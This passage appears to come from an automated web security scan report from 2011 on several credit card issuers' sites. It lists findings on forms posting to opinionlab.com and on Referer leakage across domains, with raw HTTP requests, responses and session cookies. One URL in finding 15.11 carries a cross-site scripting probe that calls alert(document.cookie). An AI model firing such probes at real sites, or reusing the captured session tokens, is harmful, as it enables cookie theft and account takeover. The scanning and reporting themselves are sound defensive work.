P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 21329
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: application/x-javascript

var custom_var,O_tmoff=6000,O_lang='en-US',_sC=0,_roC='#000000',_roB='#FFFFFF',_sp='%3A\\/\\/',_rp='%3A//',_poE=0.0,_poX=0.0,_sticky=0, _sticky_x=0,_sticky_y=0,_sH=screen.height,_d=document,_w=window,
...[SNIP]...
<BODY><FORM name=O_Frm id=O_Frm action="https://secure.opinionlab.com/rate36.asp" method=post><input type=hidden name=rating value='+O_id+'>
...[SNIP]...

14.9. https://www.discovercard.com/scripts/optimized/vendor-ac-global-bottom.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/scripts/optimized/vendor-ac-global-bottom.js

Issue detail

The page contains a form which POSTs data to the domain secure.opinionlab.com. The form contains the following fields:

rating
time1
time2
prev
referer
width
height

Request

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:31:57 GMT
Server: Apache
Last-Modified: Fri, 17 Dec 2010 04:39:14 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 21329
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: application/x-javascript

var custom_var,O_tmoff=6000,O_lang='en-US',_sC=0,_roC='#000000',_roB='#FFFFFF',_sp='%3A\\/\\/',_rp='%3A//',_poE=0.0,_poX=0.0,_sticky=0, _sticky_x=0,_sticky_y=0,_sH=screen.height,_d=document,_w=window,
...[SNIP]...
<BODY><FORM name=O_Frm id=O_Frm action="https://secure.opinionlab.com/rate32.asp" method=post><input type=hidden name=rating value='+O_id+'>
...[SNIP]...

14.10. https://www.discovercard.com/scripts/optimized/vendor-dc-global-bottom.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/scripts/optimized/vendor-dc-global-bottom.js

Issue detail

The page contains a form which POSTs data to the domain secure.opinionlab.com. The form contains the following fields:

rating
time1
time2
prev
referer
width
height

Request

GET /scripts/optimized/vendor-dc-global-bottom.js HTTP/1.1
Host: www.discovercard.com
Connection: keep-alive
Referer: https://www.discovercard.com/cardmembersvcs/loginlogout/app/ac_main
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313859|session#1308313730257-773381#1308315659|disable#browser%20timeout#1308317346; __utmz=259108511.1308313866.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=259108511.91682261.1308313866.1308313866.1308313866.1; __utmc=259108511; __utmb=259108511.1.10.1308313866

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:31:52 GMT
Server: Apache
Last-Modified: Fri, 17 Dec 2010 04:39:14 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 30731
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: application/x-javascript

var custom_var,O_tmoff=6000,O_lang='en-US',_sC=0,_roC='#000000',_roB='#FFFFFF',_sp='%3A\\/\\/',_rp='%3A//',_poE=0.0,_poX=0.0,_sticky=0, _sticky_x=0,_sticky_y=0,_sH=screen.height,_d=document,_w=window,
...[SNIP]...
<BODY><FORM name=O_Frm id=O_Frm action="https://secure.opinionlab.com/rate32.asp" method=post><input type=hidden name=rating value='+O_id+'>
...[SNIP]...

14.11. https://www.discovercard.com/scripts/optimized/vendor-dc-global-bottom.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/scripts/optimized/vendor-dc-global-bottom.js

Issue detail

The page contains a form which POSTs data to the domain secure.opinionlab.com. The form contains the following fields:

rating
custom_var
time1
time2
prev
referer
width
height

Request

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:31:52 GMT
Server: Apache
Last-Modified: Fri, 17 Dec 2010 04:39:14 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 30731
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: application/x-javascript

var custom_var,O_tmoff=6000,O_lang='en-US',_sC=0,_roC='#000000',_roB='#FFFFFF',_sp='%3A\\/\\/',_rp='%3A//',_poE=0.0,_poX=0.0,_sticky=0, _sticky_x=0,_sticky_y=0,_sH=screen.height,_d=document,_w=window,
...[SNIP]...
<BODY><FORM name=O_Frm id=O_Frm action="https://secure.opinionlab.com/rate36.asp" method=post><input type=hidden name=rating value='+O_id+'>
...[SNIP]...

15. Cross-domain Referer leakage previous next
There are 37 instances of this issue:

https://application.capitalone.com/icoreapp/jsp/landing.jsp
https://applynowdc1.chase.com/FlexAppWeb/renderApp.do
http://clickserve.cc-dt.com/link/click
http://clickserve.cc-dt.com/link/click
http://clickserve.cc-dt.com/link/click
http://clickserve.cc-dt.com/link/click
http://clickserve.cc-dt.com/link/tplclick
http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm
http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm
http://creditcards.citicards.com/usc/value/diamond_preferred/MAr2011pricing/external/default.htm
http://dg.specificclick.net/
http://gan.doubleclick.net/gan_click
http://gan.doubleclick.net/gan_click
http://gan.doubleclick.net/gan_click
http://gan.doubleclick.net/gan_click
http://gan.doubleclick.net/gan_click
http://gan.doubleclick.net/gan_click
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://tags.bluekai.com/site/2939
http://tags.bluekai.com/site/2939
https://www.applyonlinenow.com/USCCapp/Ctl/display
https://www.citicards.com/cards/acq/Apply.do
https://www.citicards.com/cards/acq/Apply.do
https://www.citicards.com/cards/acq/TimeOut.do
https://www.citicards.com/cards/acq/displayECM.do
https://www.citicards.com/cards/acq/displayECM.do
http://www.creditcards.com/oc/
https://www.discovercard.com/cardmembersvcs/acqs/app/getapp
http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732
https://www262.americanexpress.com/business-card-application/the-plum-card-business-charge-card/apply/42732-9-0/

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

15.1. https://application.capitalone.com/icoreapp/jsp/landing.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://application.capitalone.com
Path:	/icoreapp/jsp/landing.jsp

Issue detail

The page was loaded from a URL containing a query string:

https://application.capitalone.com/icoreapp/jsp/landing.jsp?s=0011857004000XXCO31XX100000SB5XXZAFF01ZZZZ000011GA11

The response contains the following links to other domains:

https://fls.doubleclick.net/activityi;src=1330903;type=smbco646;cat=smbap311;u3=FB8DCF93533EFDA4;ord=1?
https://media.adrevolver.com/adrevolver/trace?adpath=5340
https://seal.verisign.com/getseal?host_name=application.capitalone.com&size=S&use_flash=NO&use_transparent=NO&lang=en
https://switch.atdmt.com/iaction/CC_Application_Page/v3/ato.000000034041608/atc1.118574/atz.FB8DCF93533EFDA4/atx.00000SB5/aty.ZZ000011GA11

Request

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:22 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=7R2PN7BWkq05FB2nsTl1DjYPsgvXT2vPp222kzwTp1ZqXy1729fJ!-968881363; path=/
X-Powered-By: JSF/1.2
Keep-Alive: timeout=60, max=10000
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 89171

<html>
   <head>
       <title></title>
       <link href='/icoreapp/css/apex.css' type="text/css" rel="stylesheet">
       <script language="JavaScript" src='/icoreapp/js/customer_info.js'></script>
       <sc
...[SNIP]...
<div class="fpo-icon" id="verisign">
   <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=application.capitalone.com&size=S&use_flash=NO&use_transparent=NO&lang=en">
   </script>
...[SNIP]...
<noscript>
       <iframe src="https://fls.doubleclick.net/activityi;src=1330903;type=smbco646;cat=smbap311;u3=FB8DCF93533EFDA4;ord=1?" width="1" height="1" frameborder="0" style="display:none"></iframe>
...[SNIP]...
<noscript>
       <img width="0" height="0" border="0" src="https://media.adrevolver.com/adrevolver/trace?adpath=5340">
   </noscript>
...[SNIP]...
<noscript><iframe src="https://switch.atdmt.com/iaction/CC_Application_Page/v3/ato.000000034041608/atc1.118574/atz.FB8DCF93533EFDA4/atx.00000SB5/aty.ZZ000011GA11" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

15.2. https://applynowdc1.chase.com/FlexAppWeb/renderApp.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://applynowdc1.chase.com
Path:	/FlexAppWeb/renderApp.do

Issue detail

The page was loaded from a URL containing a query string:

https://applynowdc1.chase.com/FlexAppWeb/renderApp.do?SPID=DF92&CELL=6H8X&AFFID=EhraRx8K_BE-rs08mTiqNvJG3ktOS3.NLg&pvid=1118b79220110c061317070b00ed04

The response contains the following links to other domains:

https://fls.doubleclick.net/activityi;src=2299144;type=flexappl;cat='+catType+';u1='+SPID+';u2='+MSC+';u3='+CELL+';u4='+zip+';u5='+segment+';u6='+aoc+';u7='+rpc+';u8='+isKnown+';u9='+approvedSourceCode+';u10='+ECI+';u11='+GUID+';u12='+LastUpdate+';u13='+LastSent+';u14='+SPID+';u15='+APPID+';u16='+cat+';u17='+cig_app_id+';u18='+referrer+';u19='+pvid+';ord='+a+'?
https://www.firstusa.com/cgi-bin/webcgi/webserve.cgi?page_type=appterms&card=DF92

Request

Response

15.3. http://clickserve.cc-dt.com/link/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clickserve.cc-dt.com
Path:	/link/click

Issue detail

The page was loaded from a URL containing a query string:

http://clickserve.cc-dt.com/link/click?lid=41000000032191799&mid=1117231f20115b06cd1707b7120247&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D1117231f20115b06cd1707b7120247

The response contains the following link to another domain:

http://gan.doubleclick.net/link/click?lid=41000000032191799&mid=1117231f20115b06cd1707b7120247&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D1117231f20115b06cd1707b7120247

Request

GET /link/click?lid=41000000032191799&mid=1117231f20115b06cd1707b7120247&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D1117231f20115b06cd1707b7120247 HTTP/1.1
Host: clickserve.cc-dt.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581&pg=11&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 17 Jun 2011 12:12:49 GMT
Server: Apache/1.3.41 (Unix)
Location: http://gan.doubleclick.net/link/click?lid=41000000032191799&mid=1117231f20115b06cd1707b7120247&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D1117231f20115b06cd1707b7120247
Connection: close
Content-Type: text/html; charset=iso-8859-1
Expires: Fri, 17 Jun 2011 12:12:49 GMT
Content-Length: 465

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://gan.doubleclick.net/link/click?lid=41000000032191799&mid=1117231f20115b06cd1707b7120247&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D1117231f20115b06cd1707b7120247">here</A>
...[SNIP]...

15.4. http://clickserve.cc-dt.com/link/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clickserve.cc-dt.com
Path:	/link/click

Issue detail

The page was loaded from a URL containing a query string:

http://clickserve.cc-dt.com/link/click?lid=41000000015500165&mid=11258e6c2011c0061f17070a12f553&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D11258e6c2011c0061f17070a12f553

The response contains the following link to another domain:

http://gan.doubleclick.net/link/click?lid=41000000015500165&mid=11258e6c2011c0061f17070a12f553&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D11258e6c2011c0061f17070a12f553

Request

GET /link/click?lid=41000000015500165&mid=11258e6c2011c0061f17070a12f553&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D11258e6c2011c0061f17070a12f553 HTTP/1.1
Host: clickserve.cc-dt.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144656&pg=11&pgpos=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 17 Jun 2011 12:12:55 GMT
Server: Apache/1.3.41 (Unix)
Location: http://gan.doubleclick.net/link/click?lid=41000000015500165&mid=11258e6c2011c0061f17070a12f553&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D11258e6c2011c0061f17070a12f553
Connection: close
Content-Type: text/html; charset=iso-8859-1
Expires: Fri, 17 Jun 2011 12:12:55 GMT
Content-Length: 465

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://gan.doubleclick.net/link/click?lid=41000000015500165&mid=11258e6c2011c0061f17070a12f553&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D11258e6c2011c0061f17070a12f553">here</A>
...[SNIP]...

15.5. http://clickserve.cc-dt.com/link/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clickserve.cc-dt.com
Path:	/link/click

Issue detail

The page was loaded from a URL containing a query string:

http://clickserve.cc-dt.com/link/click?lid=41000000015500167&mid=1113416820111306091707d412ba49&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D1113416820111306091707d412ba49

The response contains the following link to another domain:

http://gan.doubleclick.net/link/click?lid=41000000015500167&mid=1113416820111306091707d412ba49&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D1113416820111306091707d412ba49

Request

GET /link/click?lid=41000000015500167&mid=1113416820111306091707d412ba49&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D1113416820111306091707d412ba49 HTTP/1.1
Host: clickserve.cc-dt.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144458&pg=11&pgpos=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 17 Jun 2011 12:12:50 GMT
Server: Apache/1.3.41 (Unix)
Location: http://gan.doubleclick.net/link/click?lid=41000000015500167&mid=1113416820111306091707d412ba49&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D1113416820111306091707d412ba49
Connection: close
Content-Type: text/html; charset=iso-8859-1
Expires: Fri, 17 Jun 2011 12:12:50 GMT
Content-Length: 465

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://gan.doubleclick.net/link/click?lid=41000000015500167&mid=1113416820111306091707d412ba49&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D1113416820111306091707d412ba49">here</A>
...[SNIP]...

15.6. http://clickserve.cc-dt.com/link/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clickserve.cc-dt.com
Path:	/link/click

Issue detail

The page was loaded from a URL containing a query string:

http://clickserve.cc-dt.com/link/click?lid=41000000015500167&mid=112f0d202011e80668170739127e52&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D112f0d202011e80668170739127e52

The response contains the following link to another domain:

http://gan.doubleclick.net/link/click?lid=41000000015500167&mid=112f0d202011e80668170739127e52&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D112f0d202011e80668170739127e52

Request

GET /link/click?lid=41000000015500167&mid=112f0d202011e80668170739127e52&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D112f0d202011e80668170739127e52 HTTP/1.1
Host: clickserve.cc-dt.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144458&pg=11&pgpos=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 17 Jun 2011 12:12:54 GMT
Server: Apache/1.3.41 (Unix)
Location: http://gan.doubleclick.net/link/click?lid=41000000015500167&mid=112f0d202011e80668170739127e52&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D112f0d202011e80668170739127e52
Connection: close
Content-Type: text/html; charset=iso-8859-1
Expires: Fri, 17 Jun 2011 12:12:54 GMT
Content-Length: 465

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://gan.doubleclick.net/link/click?lid=41000000015500167&mid=112f0d202011e80668170739127e52&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D6%26tid%3D112f0d202011e80668170739127e52">here</A>
...[SNIP]...

15.7. http://clickserve.cc-dt.com/link/tplclick previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clickserve.cc-dt.com
Path:	/link/tplclick

Issue detail

The page was loaded from a URL containing a query string:

http://clickserve.cc-dt.com/link/tplclick?lid=41000000031125666&pubid=21000000000112308&mid=111d1dca20115406dd17065f59f805&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D4%26tid%3D111d1dca20115406dd17065f59f805

The response contains the following link to another domain:

http://gan.doubleclick.net/gan_click?lid=41000000031125666&pubid=21000000000112308&mid=111d1dca20115406dd17065f59f805&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D4%26tid%3D111d1dca20115406dd17065f59f805

Request

GET /link/tplclick?lid=41000000031125666&pubid=21000000000112308&mid=111d1dca20115406dd17065f59f805&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D4%26tid%3D111d1dca20115406dd17065f59f805 HTTP/1.1
Host: clickserve.cc-dt.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22105561&pg=17&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 17 Jun 2011 11:59:07 GMT
Server: Apache/1.3.41 (Unix)
Location: http://gan.doubleclick.net/gan_click?lid=41000000031125666&pubid=21000000000112308&mid=111d1dca20115406dd17065f59f805&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D4%26tid%3D111d1dca20115406dd17065f59f805
Connection: close
Content-Type: text/html; charset=iso-8859-1
Expires: Fri, 17 Jun 2011 11:59:07 GMT
Content-Length: 492

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://gan.doubleclick.net/gan_click?lid=41000000031125666&pubid=21000000000112308&mid=111d1dca20115406dd17065f59f805&ximg=http%3A%2F%2Ftrackback.creditcards.com%2Facrelay%2F%3Fpid%3D4%26tid%3D111d1dca20115406dd17065f59f805">here</A>
...[SNIP]...

15.8. http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/platinum/MC/external/affiliate/Mar2011/default.htm

Issue detail

The page was loaded from a URL containing a query string:

http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&BT_TRF=42944&app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer%5F631529043&ProspectID=36CEB96C744948E481109575676DCE63

The response contains the following link to another domain:

http://view.atdmt.com/iaction/91913_USC_Plat_Select_MC_2_2011_ext_aff_2121_p

Request

Response

15.9. http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/platinum/Visa/external/affiliate/Mar2011/default.htm

Issue detail

The page was loaded from a URL containing a query string:

http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&BT_TRF=42945&app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer%5F631529116&ProspectID=EAAA394779264223B1D9C404C9AA6734

The response contains the following link to another domain:

http://view.atdmt.com/iaction/91914_USC_Plat_Select_Visa_2_2011_ext_aff_2121_p

Request

Response

15.10. http://creditcards.citicards.com/usc/value/diamond_preferred/MAr2011pricing/external/default.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/value/diamond_preferred/MAr2011pricing/external/default.htm

Issue detail

The page was loaded from a URL containing a query string:

http://creditcards.citicards.com/usc/value/diamond_preferred/MAr2011pricing/external/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E8EAC5C2D63E204E6&BT_TRF=43153&app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer%5F631529118&ProspectID=C626E9F2656E4606A21348462D13F6BA

The response contains the following link to another domain:

http://view.atdmt.com/iaction/91915_USC_Diamond_Pref_2_2011_ext_aff_2121_p

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Thu, 16 Jun 2011 12:14:16 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBTSES=SID=B5A0B5BCF8EA446D9FA72C517C7D0088; path=/
Date: Fri, 17 Jun 2011 12:14:15 GMT
Connection: close
Content-Length: 10853

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Citi® Diamond Preferred® Card</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso
...[SNIP]...
<body leftmargin="0" topmargin="0" rightmargin="0" bottommargin="0" marginwidth="0" marginheight="0">
<iframe src="http://view.atdmt.com/iaction/91915_USC_Diamond_Pref_2_2011_ext_aff_2121_p" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

15.11. http://dg.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dg.specificclick.net
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://dg.specificclick.net/?y=3&t=h&u=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F%3F3cf6d%2522-alert(document.cookie)-%2522cf7270b0551%3D1&r=http%3A%2F%2Fburp%2Fshow%2F6

The response contains the following link to another domain:

http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1

Request

Response

15.12. http://gan.doubleclick.net/gan_click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gan.doubleclick.net
Path:	/gan_click

Issue detail

The page was loaded from a URL containing a query string:

http://gan.doubleclick.net/gan_click?lid=41000000015500167&pubid=21000000000112308&mid=112f0d202011e80668170739127e52

The response contains the following link to another domain:

http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&BT_TRF=42944&app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529047

Request

GET /gan_click?lid=41000000015500167&pubid=21000000000112308&mid=112f0d202011e80668170739127e52 HTTP/1.1
Host: gan.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144458&pg=11&pgpos=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Found
Location: http://citi.bridgetrack.com/usc/_spredir.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7EEEAC5C2D66E204E6&BT_TRF=42944&app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529047
Cache-Control: private
